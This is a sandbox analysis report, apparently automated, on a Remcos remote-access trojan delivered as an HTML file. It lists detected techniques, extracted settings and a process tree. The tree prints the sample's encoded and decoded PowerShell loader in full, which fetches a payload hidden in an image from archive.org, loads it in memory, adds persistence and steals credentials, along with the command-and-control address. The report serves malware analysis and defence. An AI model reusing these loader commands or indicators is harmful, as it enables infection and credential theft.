remcos | 61aef85e41f9b217a904c5642b44402fd812822958e1d40092a579b589beecdc

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
16-09-2024 13:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

FILE_DOC_SSLMUNSRG0014624PC.html
Size

1.4MB
MD5

5e818b55b794edaad0ec09c72bfac4f1
SHA1

b0d280f693b2f36ddc4dd2911d2129bb80099f9c
SHA256

61aef85e41f9b217a904c5642b44402fd812822958e1d40092a579b589beecdc
SHA512

c52b86698d7b7c4740af8af5e9f1068b4cbfd7988735f09eeb472c2ef7c93fd2c488dc13b3f28ceba19f1e3971b4972a220ec0ebb5e465ae139f6c3b728e78f9
SSDEEP

6144:hUUfHkoqQfM8UuNZm65ay567QCMZMWZBxxBXX/lNSKZrbgOh7m:hUWCGMM567c7FS1

Score

10^/10

remcos pc file collection credential_access discovery execution persistence rat stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

exe.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

Extracted

Family

remcos

Botnet

pc file

185.150.191.117:4609

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-PICFH2
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral1/memory/5568-127-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/5584-126-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/5556-128-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/5568-127-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/5556-128-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 6 IoCs

flow	pid	Process
30	4616	powershell.exe
34	4496	powershell.exe
37	4616	powershell.exe
42	4496	powershell.exe
48	5896	powershell.exe
49	5896	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3444	powershell.exe
4496	powershell.exe
5720	powershell.exe
5896	powershell.exe
3952	powershell.exe
4616	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	AddInProcess32.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\enhadir.js"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\enhadir.js"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\enhadir.js"	powershell.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 4616 set thread context of 5324	4616	powershell.exe	118
PID 4496 set thread context of 5508	4496	powershell.exe	119
PID 5324 set thread context of 5556	5324	AddInProcess32.exe	120
PID 5324 set thread context of 5568	5324	AddInProcess32.exe	121
PID 5324 set thread context of 5584	5324	AddInProcess32.exe	122
PID 5896 set thread context of 6064	5896	powershell.exe	129

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AddInProcess32.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4624	PING.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
5168	NETSTAT.EXE

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2412658365-3084825385-3340777666-1000\{37ADD2DE-3DE1-4DBF-8C29-D79D1FF2FA52}	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 139806.crdownload:SmartScreen	msedge.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
368	Notepad.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4624	PING.EXE

Suspicious behavior: EnumeratesProcesses 42 IoCs

pid	Process
3948	msedge.exe
3948	msedge.exe
2276	msedge.exe
2276	msedge.exe
2752	identity_helper.exe
2752	identity_helper.exe
4732	msedge.exe
4732	msedge.exe
3952	powershell.exe
3952	powershell.exe
3952	powershell.exe
4616	powershell.exe
4616	powershell.exe
4616	powershell.exe
3444	powershell.exe
3444	powershell.exe
3444	powershell.exe
4496	powershell.exe
4496	powershell.exe
4496	powershell.exe
5584	AddInProcess32.exe
5584	AddInProcess32.exe
5556	AddInProcess32.exe
5556	AddInProcess32.exe
5556	AddInProcess32.exe
5556	AddInProcess32.exe
5720	powershell.exe
5720	powershell.exe
5720	powershell.exe
5896	powershell.exe
5896	powershell.exe
5896	powershell.exe
5896	powershell.exe
5896	powershell.exe
5896	powershell.exe
5896	powershell.exe
740	msedge.exe
740	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
5324	AddInProcess32.exe
5324	AddInProcess32.exe
5324	AddInProcess32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 17 IoCs

pid	Process
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	3952	powershell.exe
Token: SeDebugPrivilege	4616	powershell.exe
Token: SeDebugPrivilege	3444	powershell.exe
Token: SeDebugPrivilege	4496	powershell.exe
Token: SeDebugPrivilege	5584	AddInProcess32.exe
Token: SeDebugPrivilege	5720	powershell.exe
Token: SeDebugPrivilege	5896	powershell.exe
Token: SeDebugPrivilege	5168	NETSTAT.EXE

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe
2276	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2276 wrote to memory of 3840	2276	msedge.exe	84
PID 2276 wrote to memory of 3840	2276	msedge.exe	84
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 4020	2276	msedge.exe	85
PID 2276 wrote to memory of 3948	2276	msedge.exe	86
PID 2276 wrote to memory of 3948	2276	msedge.exe	86
PID 2276 wrote to memory of 4996	2276	msedge.exe	87
PID 2276 wrote to memory of 4996	2276	msedge.exe	87
PID 2276 wrote to memory of 4996	2276	msedge.exe	87
PID 2276 wrote to memory of 4996	2276	msedge.exe	87
PID 2276 wrote to memory of 4996	2276	msedge.exe	87
PID 2276 wrote to memory of 4996	2276	msedge.exe	87
PID 2276 wrote to memory of 4996	2276	msedge.exe	87
PID 2276 wrote to memory of 4996	2276	msedge.exe	87
PID 2276 wrote to memory of 4996	2276	msedge.exe	87
PID 2276 wrote to memory of 4996	2276	msedge.exe	87
PID 2276 wrote to memory of 4996	2276	msedge.exe	87
PID 2276 wrote to memory of 4996	2276	msedge.exe	87
PID 2276 wrote to memory of 4996	2276	msedge.exe	87
PID 2276 wrote to memory of 4996	2276	msedge.exe	87
PID 2276 wrote to memory of 4996	2276	msedge.exe	87
PID 2276 wrote to memory of 4996	2276	msedge.exe	87
PID 2276 wrote to memory of 4996	2276	msedge.exe	87
PID 2276 wrote to memory of 4996	2276	msedge.exe	87
PID 2276 wrote to memory of 4996	2276	msedge.exe	87
PID 2276 wrote to memory of 4996	2276	msedge.exe	87

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\FILE_DOC_SSLMUNSRG0014624PC.html
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfbb046f8,0x7ffdfbb04708,0x7ffdfbb04718
  2⤵
  PID:3840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:2
  2⤵
  PID:4020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8
  2⤵
  PID:4996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
  2⤵
  PID:2488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2316 /prefetch:1
  2⤵
  PID:1572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4860 /prefetch:8
  2⤵
  PID:4544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1
  2⤵
  PID:3136
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5816 /prefetch:8
  2⤵
  PID:3480
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5816 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,15132667601637266098,15684821184837660301,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2676 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4732
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\C_UsersAdministratorDesktopWernbvFILE_DOC_SSLMUNSRG0014624.js"
  2⤵
  - Checks computer location settings
  PID:3160
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AaQBhADYAMAAxADYAMAA2AC4AdQBzAC4AYQByAGMAaABpAHYAZQAuAG8AcgBnAC8AMQAwAC8AaQB0AGUAbQBzAC8AZABlAGEAdABoAG4AbwB0AGUAXwAyADAAMgA0ADAANwAvAGQAZQBhAHQAaABuAG8AdABlAC4AagBwAGcAJwA7ACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGkAbQBhAGcAZQBVAHIAbAApADsAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgBkAEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJAB0AHkAcABlACAAPQAgACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACcAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQAnACkAOwAkAG0AZQB0AGgAbwBkACAAPQAgACQAdAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwAwAC8AMgBYAFgAbgBDAC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzAHAAdAB0AGgAJwAgACwAIAAnADEAJwAgACwAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcACcAIAAsACAAJwBlAG4AaABhAGQAaQByACcALAAnAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzADMAMgAnACwAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcAKQApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3952
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('0/2XXnC/d/ee.etsap//:sptth' , '1' , 'C:\ProgramData\' , 'enhadir','AddInProcess32','desativado'))"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4616
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\enhadir.js"
        5⤵
        
        PID:5216
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        5⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:5324
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\alpgfzxbogyewrle"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5556
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\kfurgshckoqjyxzitiz"
        6⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:5568
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\Admin\AppData\Local\Temp\nhzjhkswywiwjdvuctuzii"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5584
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\C_UsersAdministratorDesktopWernbvFILE_DOC_SSLMUNSRG0014624.js"
  2⤵
  - Checks computer location settings
  PID:4944
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
